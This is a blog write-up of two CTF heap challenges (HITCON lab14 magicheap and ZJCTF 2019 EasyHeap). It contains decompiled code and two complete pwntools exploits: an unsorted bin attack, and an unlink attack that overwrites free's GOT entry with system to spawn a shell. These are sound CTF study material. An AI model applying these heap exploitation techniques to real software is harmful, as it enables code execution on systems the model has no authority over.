MENU

HITCON Training lab14 Unsorted bin attack magicheap & [ZJCTF 2019]EasyHeap

November 20, 2020 • Read: 651 • Pwn

现在居然可以一次过了,有点惊讶

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  char buf; // [rsp+0h] [rbp-10h]
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      read(0, &buf, 8uLL);
      v3 = atoi(&buf);
      if ( v3 != 3 )
        break;
      delete_heap();
    }
    if ( v3 > 3 )
    {
      if ( v3 == 4 )
        exit(0);
      if ( v3 == 4869 )
      {
        if ( (unsigned __int64)magic <= 4869 )
        {
          puts("So sad !");
        }
        else
        {
          puts("Congrt !");
          l33t();
        }
      }
      else
      {
LABEL_17:
        puts("Invalid Choice");
      }
    }
    else if ( v3 == 1 )
    {
      create_heap();
    }
    else
    {
      if ( v3 != 2 )
        goto LABEL_17;
      edit_heap();
    }
  }
}

create_heap(),申请大小可以自定义
edit_heap(),有堆溢出漏洞。
delete_heap(), 删除后指针至0
这道题应该也可以fastbin attack,所以不能算是典型的例题,等下去找一道unsorted bin attack 和 fastbin attak 打搭配的题目。

# -*- coding: utf-8 -*-
from pwn import *
r = process("./magicheap")
context.log_level = "debug"
def create_heap(size, content):
    r.sendlineafter("Your choice :", "1")
    r.sendlineafter("Size of Heap : ", str(size))
    r.sendlineafter("Content of heap:", content)

def edit_heap(idx, size, content):
    r.sendlineafter("Your choice :", "2")
    r.sendlineafter("Index :", str(idx))
    r.sendlineafter("Size of Heap : ", str(size))
    r.sendlineafter("Content of heap : ", content)

def delete_heap(idx):
    r.sendlineafter("Your choice :", "3")
    r.sendlineafter("Index :", str(idx))
magic = 0x00000000006020C0
create_heap(0x18, 'a')
create_heap(0x88, 'b')
create_heap(0x18, 'c')
delete_heap(1)
payload = 'a' * 0x18 + p64(0x91) + p64(0) + p64(magic - 0x10)
edit_heap(0, len(payload), payload)
create_heap(0x88, 'd')
r.sendlineafter("Your choice :", "4869")
r.interactive()

2020-11-29更新
这两道题目是一模一样的,但是 [ZJCTF 2019]EasyHeap 在buuoj上面直接利用magic,cat不出来,可能是配置的问题,所以我利用unlink做了一遍。

from pwn import *
from LibcSearcher import *
context.log_level = "debug"
#r = process('./easyheap')
r = remote('node3.buuoj.cn', 26026)
elf = ELF('./easyheap')

def choice(idx):
    r.sendlineafter("Your choice :", str(idx))

def create_heap(size, content):
    choice(1)
    r.sendlineafter("Size of Heap : ", str(size))
    r.sendlineafter("Content of heap:", content)

def edit_heap(idx, content):
    choice(2)
    r.sendlineafter("Index :", str(idx))
    r.sendlineafter("Size of Heap : ", str(len(content)))
    r.sendlineafter("Content of heap : ", content)

def delete_heap(idx):
    choice(3)
    r.sendlineafter("Index :", str(idx))

create_heap(0x88, 'b')
create_heap(0x88, 'b')
#delete_heap(1)
ptr = 0x00000000006020E0
FD = ptr - 0x18
BK = ptr - 0x10

edit_heap(0, p64(0) * 2 + p64(FD) + p64(BK) + 'a' * (0x88 - 0x20 - 0x8) + p64(0x80) + p64(0x90))
delete_heap(1)
#gdb.attach(r)
edit_heap(0, 'a' * 0x18 + p64(elf.got['free']))
edit_heap(0, p64(elf.plt['system']))
create_heap(0x18, 'sh\x00')
delete_heap(1)
r.interactive()
Last Modified: November 29, 2020
Archives QR Code Tip
QR Code for this page
Tipping QR Code